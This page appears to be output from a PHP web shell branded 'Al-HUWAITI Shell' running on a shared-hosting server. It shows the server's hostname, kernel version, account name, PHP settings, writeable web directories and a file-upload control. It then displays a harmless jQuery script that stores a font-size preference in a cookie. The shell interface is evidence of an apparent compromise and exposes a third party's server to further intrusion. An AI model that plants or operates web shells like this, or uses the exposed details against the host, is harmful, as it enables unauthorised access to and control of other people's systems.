Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux server.xvl.jdw.mybluehostin.me 5.14.0-611.27.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 4 04:40:11 EST 2026 x86_64
User : critatp ( 1208)
PHP Version : 8.0.30
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/critatp/public_html/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/critatp/public_html/js/font-size.js
var fontSize=100;jQuery(document).ready(function(){if(_getCookie("fontSize")!=null){var fontSize=_getCookie("fontSize");}else{var fontSize=100;}
jQuery("#fontSize").css("font-size",fontSize+"%");});function _getCookie(name){var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;while(i<clen){var j=i+alen;if(document.cookie.substring(i,j)==arg){return _getCookieVal(j);}
i=document.cookie.indexOf(" ",i)+1;if(i==0)
break;}
return null;}
function _deleteCookie(name,path,domain){if(_getCookie(name)){document.cookie=name+"="+((path)?"; path="+path:"")+((domain)?"; domain="+domain:"")+"; expires=Thu, 01-Jan-70 00:00:01 GMT";}}
function _setCookie(name,value,expires,path,domain,secure){var vurl=true;if(path!=''&&path!=undefined){vurl=validUrl(path);}
if(jQuery.type(name)=="string"&&vurl){document.cookie=name+"="+escape(value)+((expires)?"; expires="+expires.toGMTString():"")+((path)?"; path="+path:"")+((domain)?"; domain="+domain:"")+((secure)?"; secure":"");}}
function _getCookieVal(offset){var endstr=document.cookie.indexOf(";",offset);if(endstr==-1){endstr=document.cookie.length;}
return unescape(document.cookie.substring(offset,endstr));}
function set_font_size(fontType){if(fontType=="increase"){if(fontSize<110){fontSize=parseInt(fontSize)+15;}}else if(fontType=="decrease"){if(fontSize>90){fontSize=parseInt(fontSize)-15;}}else{fontSize=100;}
_setCookie("fontSize",fontSize);jQuery("#fontSize").css("font-size",fontSize+"%");}

Al-HUWAITI Shell